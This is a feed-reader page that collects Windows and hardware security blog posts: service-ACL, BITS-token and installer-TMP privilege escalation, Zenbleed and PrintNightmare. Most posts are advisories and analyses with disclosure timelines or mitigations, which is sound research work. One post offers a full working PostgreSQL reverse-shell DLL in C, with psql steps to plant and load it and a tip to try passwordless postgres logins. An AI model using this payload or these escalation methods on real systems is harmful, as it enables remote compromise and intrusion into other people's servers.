Normal view

There are new articles available, click to refresh the page.
Before yesterdayMain stream

Misconfigured Service ACL Elevation of Privilege Vulnerability in Win10 IoT Core Build 14393

25 July 2016 at 12:20
As of this writing, the latest public preview of Windows 10 IoT Core (build 14393) suffers from an elevation of privilege vulnerability via a misconfigured service ACL. The InputService service which run as SYSTEM grants authenticated users (i.e. members of the “NT AUTHORITY\Authenticated Users” group) SERVICE_ALL_ACCESS access rights, allowing an unprivileged, authenticated user to change the binary path of the service and gain elevated code execution upon restarting the service.

For reference, you can validate that InputService runs as SYSTEM with the following commands:

$InputService = Get-CimInstance -ClassName Win32_Service -Filter 'Name = "InputService"'

$InputService.StartName

Get-CimInstance -ClassName Win32_Process -Filter "ProcessId=$($InputService.ProcessId)" | Invoke-CimMethod -MethodName GetOwner

This trivial vulnerability was discovered while running the Get-CSVulnerableServicePermission function in CimSweep against an IoT Core instance running on my Raspberry Pi 2. CimSweep is designed to perform incident response and hunt operations entirely over WMI/CIM.

Exploitation

I wrote a proof of concept exploit that simply adds an unprivileged user to the Administrators group.

While this is a classic service misconfiguration vulnerability, there are several caveats to be mindful of when exploiting it on Win 10 IoT Core. First of all, IoT Core is designed to be managed remotely and for that, you are given two remote management options: PowerShell Remoting and SSH. I chose to use PowerShell Remoting in my PoC exploit primarily to point out that the default SDDL for PowerShell Remoting in IoT Core requires that users be members of the “Remote Management Users” group. Additional information on administering IoT Core with PowerShell can be found here. For reference, the default SDDL for PowerShell Remoting can be obtained and interpreted with the following command:

Get-PSSessionConfiguration -Name microsoft.powershell | Select-Object -ExpandProperty Permission

There is no such group membership requirement for SSH. Hopefully, at a future point, SSH endpoints on Windows will have the granular security controls that PowerShell Remoting offers via the PSSessionConfiguration cmdlets. Some additional caveats were that when I remoted in as an unprivileged user, I did not have sufficient privileges to use the Service cmdlets (Get-Service, Set-Service, etc.) or CIM cmdlets (Get-CimInstance, Invoke-CimMethod, etc.) in order to change the service configuration. Fortunately, sc.exe presented no such restrictions.

Conclusion

While this is by no means a “sexy” vulnerability, the fact that such a trivial vulnerability was present in a modern Windows OS tells me that perhaps Win 10 IoT Core isn’t getting the security scrutiny of other Windows operating systems. I hope that many of the same security controls and mitigations will eventually be applied to IoT Core if the plan is for this to be the operating system that drives critical infrastructure.

Lastly, if you’re attending Black Hat USA 2016, you should plan on attending Paul Sabanal’s (@polsab) talk on Windows 10 IoT Core!

Disclosure Timeline

May 22, 2016 – Vulnerability reported to MSRC
May 23, 2016 – MSRC opened a case number for the issue.
July 20, 2016 – Follow-up email sent to MSRC asking for a status update. No response received
July 25, 2016 – Decision made to release the vulnerability details

Exploiting System Mechanic Driver

By: voidsec
14 April 2021 at 13:30

Last month we (last & VoidSec) took the amazing Windows Kernel Exploitation Advanced course from Ashfaq Ansari (@HackSysTeam) at NULLCON. The course was very interesting and covered core kernel space concepts as well as advanced mitigation bypasses and exploitation. There was also a nice CTF and its last exercise was: “Write an exploit for System […]

The post Exploiting System Mechanic Driver appeared first on VoidSec.

CVE‑2021‑1079 – NVIDIA GeForce Experience Command Execution

By: voidsec
5 May 2021 at 07:11

NVIDIA GeForce Experience (GFE) v.<= 3.21 is affected by an Arbitrary File Write vulnerability in the GameStream/ShadowPlay plugins, where log files are created using NT AUTHORITY\SYSTEM level permissions, which lead to Command Execution and Elevation of Privileges (EoP). NVIDIA Security Bulletin – April 2021 NVIDIA Acknowledgements Page This blog post is a re-post of the […]

The post CVE‑2021‑1079 – NVIDIA GeForce Experience Command Execution appeared first on VoidSec.

Merry Hackmas: multiple vulnerabilities in MSI’s products

By: voidsec
16 December 2021 at 13:46

This blog post serves as an advisory for a couple of MSI’s products that are affected by multiple high-severity vulnerabilities in the driver components they are shipped with. All the vulnerabilities are triggered by sending specific IOCTL requests and will allow to: Directly interact with physical memory via the MmMapIoSpace function call, mapping physical memory […]

The post Merry Hackmas: multiple vulnerabilities in MSI’s products appeared first on VoidSec.

Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

BITS Manipulation: Stealing SYSTEM Tokens as a Normal User

18 February 2016 at 04:15

The Background Intelligent Transfer Service (BITS) is a Windows system service that facilitates file transfers between clients and servers, and serves as a backbone component for Windows Update. The service comes pre-installed on all modern versions of Windows, and is available in versions as early as Windows 2000 with service pack updates. There are ways for a non-Administrator user to manipulate the service into providing an Identification Token with the LUID of 999 (0x3e7), or the NT AUTHORITY\SYSTEM (Local System) root-equivalent user.


BITS Manipulation is a pre-stage to modern privilege escalation attacks.

BITS Manipulation is not a full exploit per se, but rather a pre-stage to local (and possibly remote) privilege escalation with a crafted executable. Identification Tokens can only lead to arbitrary code execution in the prescence of secondary Improper Access Control (CWE-284) vulnerabilities. Google's Project Zero has proved a number of full exploits using the technique. There are currently no known plans for Microsoft to fix this. Details for performing it and why it works remain exceptionally scarce.

Windows Tokens

Every user-mode thread on Windows executes with a Token, which is used as its security identifier by the kernel in order to determine access rights during system calls. When a user starts a process, the Primary Token for that process becomes one which represents the access rights of that user. Individual threads within the process are allowed to change their security context from the Primary Token through the use of Impersonation Tokens, which come in different privilege levels and can allow code execution in the context of a different user.

Impersonation tokens are used throughout Windows in order to delegate responsibilities between users and the OS default users such as Local System, Local Service, and Network Service. For instance, a server process running as Network Service can impersonate a client user and perform actions on that user's behalf. It is extremely common and not suspicious behavior for a process to have multiple tokens open at any given time.

Token Impersonation Levels

A normal user obtaining an Identification Token as Local System is not necessarily an exploit in and of itself (some would argue, but at least not in the eyes of Microsoft). To understand why, a review of Token Impersonation Levels is required.

BITS Manipulation and similar techniques only provide a SecurityIdentification Token for SYSTEM. This is useful for a number of tasks, but it still does not allow arbitrary code execution in the context of that user. Ordinarily, in order to achieve code execution as SYSTEM, the Token would need to be an Impersonation Token with the SecurityImpersonation or SecurityDelegation privilege.

Identification-Only Exploitation

There are a number of vulnerabilities in Windows where the Impersonation Level is not properly validated, such as in MS15-001, MS15-015, and MS15-050. These vulnerabilities failed to check if the Token Impersonation Level was sufficiently privileged before allowing arbitrary code execution in the context of the user.

Here is a (simplified) reverse engineering of services.exe prior to the MS15-050 patch:


Before MS15-050 Patch: The calling thread's Token is checked to see if it is run as SYSTEM, or LUID 999.

With the background information above, the bug is easy to spot. Here is the same code after the patch:


After MS15-050 Patch: The Impersonation Level is now correctly verified before the SYSTEM check.

It should now be apparent why a normal user attempting to escalate privileges would want a SYSTEM Token, even if it is only of the SecurityIdentification privilege. There are countless token access control vulnerabilities already discovered, and more likely to be found.

BITS Manipulation Methodology

BITS, by default, is an automatically started Windows service which logs on as Local System. While the service is primarily used for uploading and downloading files between machines, it is also possible to create a BITS server which services the local machine context. When a download is queued, the BITS service connects to the server as the SYSTEM user.


Forcing a BITS download to an attacker-controlled BITS server allows capture of a SYSTEM token.

Here is the general methodology, which can be performed as a non-Administrator user on the machine:

  1. Create a BITS server with a local context.
  2. Launch a BITS download job, causing SYSTEM to start a client to the local BITS server.
  3. Capture SYSTEM's token when it interacts with the server.

BITS Manipulation Implementation

BITS is served on top of Microsoft's Component Object Model (COM). COM is a topic of extensive study, but it is essentially a language-neutral object-oriented binary-interface which is an arguable precursor to .NET. Remnants of COM objects are found in various areas throughout the system, including inter-process (and inter-network) communications with network and local services. BITS Manipulation is fairly straightforward to implement for a software engineer familiar with the aforementioned methodology, BITS documentation, and experience using COM.

There is an already-written implementation that is available in Metasploit under exploit/windows/local/ntapphelpcachecontrol (MS15-001). The C++ source code offers a simple drop-in implementation for future proof-of-concepts, uncredited but likely written by James Forshaw of Google's Project Zero.

Windows DLL to Shell PostgreSQL Servers

21 June 2016 at 04:07
On Linux systems, you can include system() from the standard C library to easily shell a Postgres server. The mechanism for Windows is a bit more complicated.

I have created a Postgres extension (Windows DLL) that you can load which contains a reverse shell. You will need file write permissions (i.e. postgres user). If the PostgreSQL port (5432) is open, try logging on as postgres with no password. The payload is in DllMain and will run even if the extension is not properly loaded. You can upgrade to meterpreter or other payloads from here.


#define PG_REVSHELL_CALLHOME_SERVER "127.0.0.1"
#define PG_REVSHELL_CALLHOME_PORT "4444"

#include "postgres.h"
#include <string.h>
#include "fmgr.h"
#include "utils/geo_decls.h"
#include <winsock2.h> 

#pragma comment(lib,"ws2_32")

#ifdef PG_MODULE_MAGIC
PG_MODULE_MAGIC;
#endif

#pragma warning(push)
#pragma warning(disable: 4996)
#define _WINSOCK_DEPRECATED_NO_WARNINGS

BOOL WINAPI DllMain(_In_ HINSTANCE hinstDLL, 
                    _In_ DWORD fdwReason, 
                    _In_ LPVOID lpvReserved)
{
    WSADATA wsaData;
    SOCKET wsock;
    struct sockaddr_in server;
    char ip_addr[16];
    STARTUPINFOA startupinfo;
    PROCESS_INFORMATION processinfo;

    char *program = "cmd.exe";
    const char *ip = PG_REVSHELL_CALLHOME_SERVER;
    u_short port = atoi(PG_REVSHELL_CALLHOME_PORT);

    WSAStartup(MAKEWORD(2, 2), &wsaData);
    wsock = WSASocket(AF_INET, SOCK_STREAM, 
                      IPPROTO_TCP, NULL, 0, 0);

    struct hostent *host;
    host = gethostbyname(ip);
    strcpy_s(ip_addr, sizeof(ip_addr), 
             inet_ntoa(*((struct in_addr *)host->h_addr)));

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr(ip_addr);

    WSAConnect(wsock, (SOCKADDR*)&server, sizeof(server), 
              NULL, NULL, NULL, NULL);

    memset(&startupinfo, 0, sizeof(startupinfo));
    startupinfo.cb = sizeof(startupinfo);
    startupinfo.dwFlags = STARTF_USESTDHANDLES;
    startupinfo.hStdInput = startupinfo.hStdOutput = 
                            startupinfo.hStdError = (HANDLE)wsock;

    CreateProcessA(NULL, program, NULL, NULL, TRUE, 0, 
                  NULL, NULL, &startupinfo, &processinfo);

    return TRUE;
}

#pragma warning(pop) /* re-enable 4996 */

/* Add a prototype marked PGDLLEXPORT */
PGDLLEXPORT Datum dummy_function(PG_FUNCTION_ARGS);

PG_FUNCTION_INFO_V1(add_one);

Datum dummy_function(PG_FUNCTION_ARGS)
{
    int32 arg = PG_GETARG_INT32(0);

    PG_RETURN_INT32(arg + 1);
}



Here is the convoluted process of exploitation:
postgres=# CREATE TABLE hextable (hex bytea);
postgres=# CREATE TABLE lodump (lo OID);


user@host:~/$ echo "INSERT INTO hextable (hex) VALUES 
              (decode('`xxd -p pg_revshell.dll | tr -d '\n'`', 'hex'));" > sql.txt
user@host:~/$ psql -U postgres --host=localhost --file=sql.txt


postgres=# INSERT INTO lodump SELECT hex FROM hextable; 
postgres=# SELECT * FROM lodump;
  lo
-------
 16409
(1 row)
postgres=# SELECT lo_export(16409, 'C:\Program Files\PostgreSQL\9.5\Bin\pg_revshell.dll');
postgres=# CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS
           'C:\Program Files\PostgreSQL\9.5\binpg_revshell.dll', 'dummy_function' LANGUAGE C STRICT; 

CVE Farming through Software Center – A group effort to flush out zero-day privilege escalations

31 May 2022 at 08:19

Intro

In this blog post we discuss a zero-day topic for finding privilege escalation vulnerabilities discovered by Ahmad Mahfouz. It abuses applications like Software Center, which are typically used in large-scale environments for automated software deployment performed on demand by regular (i.e. unprivileged) users.

Since the topic resulted in a possible attack surface across many different applications, we organized a team event titled “CVE farming” shortly before Christmas 2021.

Attack Surface, 0-day, … What are we talking about exactly?

NVISO contributors from different teams (both red and blue!) and Ahmad gathered together on a cold winter evening to find new CVEs.

Targets? More than one hundred installation files that you could normally find in the software center of enterprises.
Goal? Find out whether they could be used for privilege escalation.

The original vulnerability (patient zero) resulting in the attack surface discovery was identified by Ahmad and goes as follows:

Companies correctly don’t give administrative privileges to all users (according to the least privilege principle). However, they also want the users to be able to install applications based on their business needs. How  is this solved? Software Center portals using SCCM (System Center Configuration Manager, now part of Microsoft Endpoint Manager) come to the rescue. Using these portals enables users to install applications without giving them administrative privileges.

However, there is an issue. More often than not these portals run the installation program with SYSTEM privileges, which in their turn use a temporary folder for reading or writing resources used during installation. There is a special characteristic for the TMP environment variable of SYSTEM. And that is – it is writable for a regular user.

Consider the following example:

By running the previous command, we just successfully wrote to a file located in the TEMP directory of SYSTEM.

Even if we can’t read the file anymore on some systems, be assured that the file was successfully  written:

To check that SYSTEM really has TMP pointing to C:\Windows\TEMP, you could run the following commands (as administrator):

PsExec64.exe /s /i cmd.exe

echo %TMP%

The /s option of PsExec tells the program to run the process in the SYSTEM context. Now if you would try to write to a file of an Administrator account’s TMP directory, it would not work since your access is denied. So if the installation runs under Administrator and not SYSTEM, it is not vulnerable to this attack.

How can this be abused?

Consider a situation where the installation program, executed under a SYSTEM context:

  • Loads a dll from TMP
  • Executes an exe file from TMP
  • Executes an msi file from TMP
  • Creates a service from a sys file in TMP

This provides some interesting opportunities! For example, the installation program can search in TMP for a dll file. If the file is present, it will load it. In that case the exploitation is simple; we just need to craft our custom dll, rename it, and place it where it is being looked for. Once the installation runs we get code execution as SYSTEM.

Let’s take another example. This time the installation creates an exe file in TMP and executes it. In this case it can still be exploitable but we have to abuse a race condition. What we need to do is craft our own exe file and continuously overwrite the target exe file in TMP with our own exe. Then we start the installation and hope that our own exe file will be executed instead of the one from the installation. We can introduce a small delay, for example 50 milliseconds, between the writes hoping the installation will drop its exe file, which gets replaced by ours and executed by the installation within that small delay. Note that this kind of exploitation might take more patience and might need to restart the installation process multiple times to succeed. The video below shows an example of such a race condition:

However, even in case of execution under a SYSTEM context, applications can take precautions against abuse. Many of them read/write their sources to/from a randomized subdirectory in TMP, making it nearly impossible to exploit. We did notice that in some cases the directory appears random, but in fact remains constant in between installations, also allowing for abuse. 

So, what was the end result?

Out of 95 tested installers, 13 were vulnerable, 7 need to be further investigated and 75 were not found to be vulnerable. Not a bad result, considering that those are 13 easy to use zero-day privilege escalation vulnerabilities 😉. We reported them to the respective developers but were met with limited enthousiasm. Also, Ahmad and NVISO reported the attack surface vulnerability to Microsoft, and there is no fix for file system permission design. The recommendation is for the installer to follow the defense in depth principle, which puts responsibility with the developers packages their software.

If you’re interested in identifying this issue on systems you have permission on, you can use the helper programs we will soon release in an accompanying Github repository.

Stay tuned!

Defense & Mitigation

Since the Software Center is working as designed, what are some ways to defend against this?

  • Set AppEnforce user context if possible
  • Developers should consider absolute paths while using custom actions or make use of randomized folder paths
  • As a possible IoC for hunting: Identify DLL writes to c:\windows\temp

References

https://docs.microsoft.com/en-us/windows/win32/msi/windows-installer-portal
https://docs.microsoft.com/en-us/windows/win32/msi/installation-context
https://docs.microsoft.com/en-us/windows/win32/services/localsystem-account
https://docs.microsoft.com/en-us/mem/configmgr/comanage/overview
https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/packages-and-programs
https://docs.microsoft.com/en-us/mem/configmgr/apps/deploy-use/create-deploy-scripts
https://docs.microsoft.com/en-us/windows/win32/msi/custom-actions
https://docs.microsoft.com/en-us/mem/configmgr/core/understand/software-center
https://docs.microsoft.com/en-us/mem/configmgr/core/clients/deploy/deploy-clients-cmg-azure
https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security

About the authors

Ahmad, who discovered this attack surface, is a cyber security researcher mainly focus in attack surface reduction and detection engineering. Prior to that he did software development and system administration and holds multiple certificates in advanced penetration testing and system engineering. You can find Ahmad on LinkedIn.

Oliver, the main author of this post, is a cyber security expert at NVISO. He has almost a decade and a half of IT experience which half of it is in cyber security. Throughout his career he has obtained many useful skills and also certificates. He’s constantly exploring and looking for more knowledge. You can find Oliver on LinkedIn.

Jonas Bauters is a manager within NVISO, mainly providing cyber resiliency services with a focus on target-driven testing. As the Belgian ARES (Adversarial Risk Emulation & Simulation) solution lead, his responsibilities include both technical and non-technical tasks. While occasionally still performing pass the hash (T1550.002) and pass the ticket (T1550.003), he also greatly enjoys passing the knowledge. You can find Jonas on LinkedIn.


Chaining Bugs: NVIDIA GeForce Experience (GFE) Command Execution

By: Ylabs
13 May 2021 at 15:30
Reading Time: 5 minutes NVIDIA GeForce Experience (GFE) v.<= 3.21 is affected by an Arbitrary File Write vulnerability in the GameStream/ShadowPlay plugins, where log files are created using NT AUTHORITY\SYSTEM level permissions, which lead to Command Execution and Elevation of Privileges (EoP). NVIDIA Security Bulletin – April 2021 NVIDIA Acknowledgements Page Introduction Some time ago I was looking for […]

Merry Hackmas: multiple vulnerabilities in MSI’s products

By: Ylabs
16 December 2021 at 16:30
Reading Time: 2 minutes This blog post serves as an advisory for a couple MSI’s products that are affected by multiple high-severity vulnerabilities in the driver components they are shipped with. All the vulnerabilities are triggered by sending specific IOCTL requests and will allow to: Directly interact with physical memory via the MmMapIoSpace function call, mapping physical memory into […]

PrivEsc on a production-mode POS

By: Ylabs
30 March 2023 at 15:00
Reading Time: 8 minutes Earlier this year, we were involved in the security assessment of a mobile application that included the use and verification of a POS, a Pax D200. An Internet search aimed at identifying any known vulnerabilities about it, led us to this post called pax-pwn and written by lsd.cat where three CVEs were reported and described […]

GIS3W: Persistent XSS in G3WSuite 3.5 – CVE-2023-29998

By: Ylabs
6 July 2023 at 15:00
Reading Time: 6 minutes GIS3W: Persistent XSS in G3WSuite 3.5 – CVE-2023-29998 Overview During an engagement on a client’s public infrastructure, we detected an exposed installation of G3WSuite. Since we were asked to perform a black box pentest on the G3WSuite installation, we had to find a way to gather as much information about the target as possible. Luckily […]

Zenbleed – AMD Side-Channel Attack Targets Vectorised Functions

30 August 2023 at 09:00

This article provides a technical analysis of Zenbleed, a side-channel attack affecting all AMD Zen 2 processors. Tavis Ormandy reported this vulnerability to AMD on 15 May 2023 and it was assigned CVE-2023-20593. The vulnerability is of particular concern for shared hosting providers, virtualisation platforms, and other shared-tenant systems. However, any scenario where a malicious actor can execute code potentially poses a threat, including in contexts such as privilege escalation, sandbox escape, and possibly even malicious JavaScript executing in a web browser.

While AMD has historically enjoyed relative respite from side-channel attack publications, this past disparity was largely due to Intel’s processors being a more attractive research target, with a greater depth of information available around engineering features (e.g. red unlock) and internals (e.g. microcode structure), and a greater share of the server market at the time. In the five years since Meltdown and Spectre, researchers have been busy closing the knowledge gap around AMD’s processors, making it easier to discover impactful security issues.

The Zenbleed vulnerability exploits incorrect recovery behaviour after a branch misprediction involving optimised vector instructions, resulting in information within floating point unit (FPU) registers being leaked. Vectorisation is frequently utilised in common library functions (e.g. memcpy, memcmp, strlen) for performance reasons, making this a very wide-reaching vulnerability in terms of the types of data that can be extracted.

To understand Zenbleed, we need to dig into modern processor design. Modern x86_64 processors do not simply execute one instruction after the next. Instead, they operate in a superscalar manner, essentially executing multiple instructions at once using techniques such as instruction-level parallelism (ILP) and out-of-order execution. While the processor outwardly appears to have a small number of general purpose registers (e.g. rax, rbx, r12, etc.) and a bank of SIMD registers (e.g. xmm0, ymm3, etc.), each processor core actually has a far larger number of internal registers. The named registers aren’t uniquely represented by a single physical hardware register each, but are rather dynamically allocated in a register file. This enables some very important optimisations.

For example, if you were to execute the instruction xchg rax, rcx, the processor almost certainly doesn’t move any values between physical hardware registers within the register file. Instead, it performs a register rename, essentially swapping the labels on the register file entries. This also happens with SIMD registers, allowing for complex behaviours and optimisations relating to the “nesting” of registers (e.g. xmm1 being one half of ymm1, which in turn is one half of zmm1).

When we think of a classical processor design, we typically think of it having an instruction decoder, an arithmetic logic unit (ALU), a floating point unit (FPU), etc. However, a superscalar processor actually has several of these per core, and uses a complex scheduling system to execute many operations at the same time. By identifying data dependencies between instructions, the processor can identify cases where later instructions do not depend upon the results of previous instructions, allowing it to execute the instruction at the same time.

For example, consider the following sequence of instructions:

mov rcx, [rbp+0x8]
lea rcx, [rcx*0x4]
sub rax, 0x8
add rcx, rax
xor rax, rax
mov [rbp+0x8], rax
mov [rbp+0x10], rcx

Rather than executing the first instruction, stalling while waiting for the memory fetch to complete, then working on the next instructions, the processor can instead look ahead and see that sub rax, 0x8 does not depend upon the results of the first two instructions and choose to execute it simultaneously. It may also recognise that xor rax, rax sets rax to zero, thus not depending on the value of rax before that time, allowing it to start working on further instructions too, as long as memory accesses are correctly ordered. Not only this, but if the processor’s register allocation scheme keeps track of which entries in the register file are zero, then it does not need to explicitly zero a register to represent rax, but can simply reuse an already-zeroed entry.

By carefully accounting for data dependencies and memory access ordering, the processor can parallelise operations across multiple physical ALUs and other units at the same time, re-ordering operations to try to ensure maximum utilisation of parallel units at all times. This also occurs with SIMD instructions, with special accounting for the upper and lower halves of the SIMD registers (xmm*, ymm*, zmm*) to help identify data dependencies when independent pieces of data are simultaneously processed in a vectorised manner.

This behaviour also interacts with speculative execution, where the processor tries to guess what the result of a branch instruction will be and continues execution as if the guess was correct, then rolls back to the previous state if the guess was incorrect. For example:

cmp rax, [rcx]
je skip
add rcx, 4
lea rax, [rcx*2+8]
mov [rcx], rax
skip:
add rcx, 8

When the processor hits je skip, the memory fetch from the first instruction is still in flight, so it doesn’t yet know whether the branch will be taken or not. Without speculative execution this results in a pipeline stall while the memory fetch completes. To avoid this stall, the processor makes a branch prediction (i.e. an informed guess based on various metadata and prior observations) and saves a checkpoint. It then continues execution as if its prediction was correct (i.e. either after the branch or at the branch target, depending on what the prediction was) and either commits or rolls back its state depending on whether its prediction later turns out to be correct.

Let’s say that the processor guesses that the branch is not taken. It executes the code immediately after the branch (i.e. add rcx, 4, …) and continues until it hits the write hazard at mov [rcx], rax. It may also look ahead and see that it would execute add rcx, 8, which is not dependent on the write hazard, and execute that too. ILP also applies here, so some of these operations can be done in parallel.

When the memory fetch issued by cmp rax, [rcx] comes back, the processor now knows whether or not its prediction was correct. If it was, it commits the speculatively executed state and carries on. If it wasn’t, it has to roll back the state to an earlier checkpoint.

The Zenbleed vulnerability arises from faulty behaviour when a branch misprediction rollback occurs immediately after a special SIMD register optimisation and register rename occur.

The optimisation in question is called the XMM Register Merge Optimization. AMD Zen 2 processors keep track of SIMD registers whose upper halves have been zeroed, using a z-bit in its Register Allocation Table (RAT). When an instruction writes non-zero data to the upper half of a register, the z-bit is cleared, indicating that there is data present and any subsequent instructions that might be affected by that data cannot be executed until the data dependency is resolved. However, if the upper half is zeroed, instructions that also do not modify that upper half can proceed without waiting, avoiding the data dependency and resulting pipeline stall.

Tavis Ormandy’s writeup of the Zenbleed demonstrates this optimisation using the AVX2 optimised strlen function from glibc:

vpxor xmm0, xmm0, xmm0 ; xor xmm0 with xmm0 and store it in xmm0 (extends to ymm0)
vpcmpeqb ymm1, ymm0, [rdi] ; compare the memory at rdi to ymm0, store result in ymm1
vpmovmskb eax, ymm1 ; set eax to a 32-bit bitmap of null bytes in the ymm1 register
tzcnt eax, eax ; count the trailing zeroes
vzeroupper ; zero the upper 128 bits of ymm0-ymm15

The first instruction zeroes the 128-bit SIMD register xmm0 (similar to xor rax, rax) and, in the process, also zeroes the 256-bit SIMD register ymm0 which encompasses it, since xmm0 is the lower half of ymm0.

The second instruction, vpcmpeqb (vector compare equal bytes), treats the ymm0 register as 32 packed bytes and compares those to the 32 bytes of memory pointed to by rdi. Bytes that are equal produce a corresponding byte of all 1s in the ymm1 destination register, whereas bytes that are not equal produce a corresponding byte of all 0s.

The third instruction, vpmovmskb (vector move byte mask), takes the most significant bit of each packed byte in the ymm1 register and writes it to the corresponding bit in eax. This results in MSBs from 32 separate bytes in ymm1 being packed into a single 32-bit general purpose register.

The fourth instruction counts the trailing zeroes in eax. Since each bit in eax now represents a byte in the source memory that was zero, this finds how many trailing \0 characters appeared after the end of a 32-byte aligned string chunk.

The fifth instruction, vzeroupper, is not functionally required – the code has already finished calculating the number of trailing \0 characters – but its presence is important for performance. The instruction zeroes the upper halves of all ymm registers (and zmm registers too) – or, rather, what this actually does is set the corresponding z-bits being in the RAT to indicate that the upper halves of each register are zero, without actually zeroing any underlying entries in the register file. The lower half of the ymm register (accessible via xmm*) is still allocated in the register file, but it is merged with an upper half that is unallocated and marked as zero via its z-bit.

This is why the vzeroupper instruction helps prevent the processor from falsely assuming data dependencies in subsequent instructions that use the ymm registers. The XMM Register Merge Optimization allows the processor to identify instructions which do not write to the upper portion of the register, thus letting them execute without treating the upper (zero) portion of the register as a data dependency. This uncouples the data dependency between overlapping xmm and ymm registers.

Unfortunately it seems that AMD Zen 2 processors do not correctly handle the case when a vzeroupper instruction is speculatively executed and then rolled back due to branch misprediction. The scenario is as follows:

  1. SIMD instructions that support the XMM Register Merge Optimisation are executed, using xmm operands.
  2. A register rename is triggered on the overlapping ymm operand, e.g. by the vmovdqa instruction.
  3. A branch is reached and the CPU speculatively executes past it.
  4. A vzeroupper instruction is speculatively executed, which sets the z-bit on the upper halves of all ymm registers and deallocates their respective entries in the register file.
  5. The branch condition is resolved and misprediction is detected.
  6. The processor rolls back the vzeroupper instruction by clearing the z-bits and re-allocating the entries.
  7. Execution continues from the correct branch path.

However, when the rollback occurs, the processor resets the z-bit to zero, leaving the register in an undefined state, with the upper half of the ymm register pointing at an uninitialised entry in the register file. This is comparable to a use-after-free bug, but in the processor’s register file instead of system memory.

Since the register file is shared by SMT cores, this can be used to snoop on data in the SIMD registers across hyperthreads. This isn’t the only attack scenario, though – the same attack can be leveraged for privilege escalation.

While it might initially seem like SIMD registers aren’t particularly interesting, they are used in optimised versions of almost all string and memory manipulation functions in standard libraries. This means they are constantly handling sensitive data like passwords, keys, configuration files, etc. making all this data vulnerable to leakage.

There is a PoC exploit for Zenbleed on GitHub which is capable of dumping data across hyperthreads. The code is also nicely commented and quite easy to follow.

AMD released Bulletin AMD-SB-7008 “Cross-Process Information Leak” to track the issue. They also released a microcode patch to address the issue on Family 17h Model 31h (EPYC 7002 series) and Family 17h Model 0Ah (Sabrina SoCs). So far there are no microcode updates for consumer products, meaning that AMD’s desktop, mobile, HEDT, and workstation (Threadripper) processors remain vulnerable. AGESA firmware updates are scheduled for release in October and December 2023, which should contain new microcode for those products. It seems that the coordinated disclosure process for Zenbleed went a little off the rails, possibly due to AMD accidentally publishing information several months ahead of the agreed embargo date, resulting in the bug being disclosed 3-4 months ahead of patch availability.

On systems where the microcode or firmware updates cannot be applied, a workaround is possible using a chicken bit in the DE_CFG register at MSR 0xC0011029. Setting bit 9 in this register enables a backup fix, but has additional performance impact compared to the microcode update. Linux’s name for this workaround bit is MSR_AMD64_DE_CFG_ZEN2_FP_BACKUP_FIX_BIT, which it should automatically apply on affected platforms when no microcode update is present. The bit can manually be set on Linux using msr-tools, or on FreeBSD with cpucontrol.

At the time of writing, Microsoft do not appear to have a security update that applies the DE_CFG[9] chicken bit workaround. You can modify MSRs using RWEverything on Windows, although that comes with its own risks and is probably not a sensible thing to do in production.

It is possible to query which version of microcode has been applied, to test whether an updated version has been applied, although the method is OS specific. On Windows, the microcode version information is found in the following registry key:

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

The Update Revision value describes the microcode version that has been loaded into the processor, and the Previous Update Revision describes the microcode version that was loaded into the processor by the system firmware (UEFI / BIOS) at boot.

On Linux, /proc/cpuinfo will list the microcode version alongside other processor details:

processor : 127
vendor_id : AuthenticAMD
cpu family : 23
model : 1
model name : AMD EPYC 7601 32-Core Processor
stepping : 2
microcode : 0x8001206

The same info can also usually be found in the kernel boot log.

For Zen 2 architecture EPYC processors, a microcode version of 0x0830107a or higher indicates that a fix was applied. For Zen 2 architecture Sabrina SoCs, a microcode version of 0x08a00008 or higher indicates that a fix was applied. As noted above, all other processor families, including desktop Ryzen processors, are yet to receive a microcode update with a patch, so we don’t yet know what the fixed microcode versions will be.

In the interim, Linux should automatically apply software mitigations for Zenbleed. You can query the status of these mitigations through the sysfs interface, under the following directory:

/sys/devices/system/cpu/vulnerabilities/

If you’re running a server with a Zen 2 EPYC processor, you should update your firmware and install all OS patches to help ensure that Zenbleed is patched. If your system vendor has yet to release firmware updates to address this issue, it is possible that your OS will still load the new microcode blobs at boot, so make sure to check that first before trying to implement any manual workarounds. As always, refer to vendor guidance for good practice mitigation strategies.

The post Zenbleed – AMD Side-Channel Attack Targets Vectorised Functions appeared first on LRQA Nettitude Labs.

A Practical Guide to PrintNightmare in 2024

By: itm4n
27 January 2024 at 23:00
Although PrintNightmare and its variants were theoretically all addressed by Microsoft, it is still affecting organizations to this date, mainly because of quite confusing group policies and settings. In this blog post, I want to shed a light on those configuration issues, and hopefully provide clear guidance on how to remediate them. “PrintNightmare” and “Point and Print” Unless you’ve been ...
❌
❌